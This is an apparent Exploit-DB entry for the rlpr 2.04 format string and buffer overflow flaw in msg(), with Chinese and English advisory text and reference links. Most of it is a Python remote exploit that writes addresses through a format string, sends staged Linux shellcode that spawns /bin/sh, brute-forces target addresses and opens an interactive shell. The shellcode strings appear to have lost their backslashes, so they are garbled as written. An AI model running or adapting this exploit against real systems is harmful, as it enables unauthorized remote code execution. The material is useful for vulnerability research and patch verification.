https://www.exploit-db.com/exploits/24223
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-033

rlpr是一款不使用/etc/printcap的lpd打印工具。rlpr包含的msg()函数存在格式串和缓冲区溢出问题，本地或远程攻击者可以利用这个漏洞以rlprd进程权限执行任意指令。问题一是msg()调用syslog函数记录时没有进行任何过滤，提交格式串数据可能破坏内存信息。另外msg()函数对输入缺少充分缓冲区边界检查，可导致缓冲区溢出攻击。精心构建提交数据可能以rlprd进程(远程)或者root(本地)权限执行任意指令。

source: http://www.securityfocus.com/bid/10578/info

It is reported that rlpr is prone to multiple vulnerabilities. These vulnerabilities can allow a remote attacker to execute arbitrary code in order to gain unauthorized access.

The application is affected by a format string vulnerability. This vulnerability presents itself due to insufficient sanitization of user-supplied data through the 'msg()' function.

The 'msg()' function is also affected by a buffer overflow vulnerability. This issue occurs due to insufficient boundary checking and may also be exploited to gain unauthorized access to a vulnerable computer. 

rlpr versions 2.04 and prior are affected by these issues.

#!/usr/bin/python
import os, sys, socket, struct, time, telnetlib

class rlprd:
	fd = None
	pad = 2 

	#00000000  31DB              xor ebx,ebx
	#00000002  F7E3              mul ebx
	#00000004  B003              mov al,0x3
	#00000006  80C304            add bl,0x4
	#00000009  89E1              mov ecx,esp
	#0000000B  4A                dec edx
	#0000000C  CC                int3
	#0000000D  CD80              int 0x80
	#0000000F  FFE1              jmp ecx
	
	# read(4, esp, -1); jmp ecx
	lnx_readsc = "x31xdbxf7xe3xb0x03x80xc3x04x89xe1x4axcdx80xffxe1"
	lnx_stage_one = "x90" * (23 - len(lnx_readsc)) + lnx_readsc
	# dup2 shellcode(4->0,1,2)
	lnx_stage_two  = "x31xc0x89xc3x89xc1x89xc2xb2x3fx88xd0xb3x04" 
	lnx_stage_two += "xcdx80x89xd0x41xcdx80x89xd0x41xcdx80"
	# execute /bin/sh	
	lnx_stage_two += "x90" * 100
	lnx_stage_two += "x31xd2x52x68x6ex2fx73x68x68"
	lnx_stage_two += "x2fx2fx62x69x89xe3x52x53x89"
	lnx_stage_two += "xe1x8dx42x0bxcdx80"

	targets = [ [ 0 ], [ "Compiled test platform", 0x0804c418, 0xbffff9e8 ] ] 
		
	bruteforce = 0

	def __init__(self, host, os, target, port=7290):
		self.host = host
		self.port = port

		set = 0
		if(os == "linux"):
			set = 1
			self.stage_one = self.lnx_stage_one
			self.stage_two = self.lnx_stage_two

		if(set == 0):
			print "Unknown OS"
			os._exit()

		self.os = os
		
		if(target == 0):
			self.bruteforce = 1
		else:	
			self.args = self.targets[target]

	def wl16(self, write_byte):
		write_byte += 0x10000
		self.already_written %= 0x10000
		padding = (write_byte - self.already_written) % 0x10000
		if(padding < 10):
			padding += 0x10000

		self.already_written += padding

		return padding

	def connect(self):
		#if self.fd is not None:
		#	self.fd.close()
		#	self.fd = None

		self.fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
		self.fd.connect((self.host, self.port))
	
	def exploit(self, where, what):
		if(not self.fd or self.fd is None): self.connect()
		self.already_written = len('gethostbyname(')

		#print "# of nops: %dn" % (23 - len(self.readsc))

		exploit = "x" * self.pad
		self.already_written += self.pad

		exploit += struct.pack("<l", where)
		exploit += struct.pack("<l", where + 2)
		self.already_written += 8		

		l = self.wl16(what & 0xffff)
		fill = "%1$" + str(l) + "u"
		exploit += fill

		exploit += "%7$hn"
		
		l = self.wl16(what >> 16)
		fill = "%1$" + str(l) + "u"
		exploit += fill

		exploit += "%8$hn"

		#print "[*] Format string: (%s) Len: %d" % (exploit, len(exploit))
		#print "[*] Stage 1 length: %d" % len(self.stage_one)

		#time.sleep(5)
		try:
			self.fd.send(exploit + self.stage_one + "n")
			self.fd.send(self.stage_two)
			time.sleep(1)
			self.fd.send("echo spawned; uname -a; id -a;n")
			print "Recieved: " + self.fd.recv(1024)
		except:
			self.fd.close()
			self.fd = None 
			print "tFailed @ 0x%08x" % what
			return 0

		remote = telnetlib.Telnet()
		remote.sock = self.fd
		print "[*] You should now have a shell"
		remote.interact()
		os.exit(0)

	def force(self, where, high, lo):
		for i in range(high, lo, -8):
			r.exploit(where, i)

	def run(self):
		if(self.bruteforce):
			print "Bruteforcing.."
			#print "not implemented yet"
			#os._exit(1)
			for i in range(0x0804c000, 0x0804d000, 0x100 / 6):
				print "Trying: 0x%08x" % i
				self.force(i, 0xbffffa00, 0xbffff9c0)

		#self.exploit(self.args[1], self.args[2])

if __name__ == '__main__':
	if(len(sys.argv) != 4):
		print "%s host [linux] targetid"
		print "- 0 to brute force"
		print "- 1 custom compile"
		os._exit(0)

	print "%s-%s-%s" % (sys.argv[1], sys.argv[2], sys.argv[3])
	r = rlprd(sys.argv[1], sys.argv[2], int(sys.argv[3]))
	#r.exploit(0x0804c418, 0xbffff9e8)
	#r.force(0x0804c418, 0xbffffa00, 0xbffff800)
	r.run()

来源:XF
名称:rlpr-msg-format-string(16453)
链接:http://xforce.iss.net/xforce/xfdb/16453
来源:BID
名称:10578
链接:http://www.securityfocus.com/bid/10578
来源:DEBIAN
名称:DSA-524
链接:http://www.debian.org/security/2004/dsa-524
来源:BUGTRAQ
名称:20040624RlprAdvisory
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108810992313652&w;=2
来源:BID
名称:10578
链接:http://www.securityfocus.com/bid/10578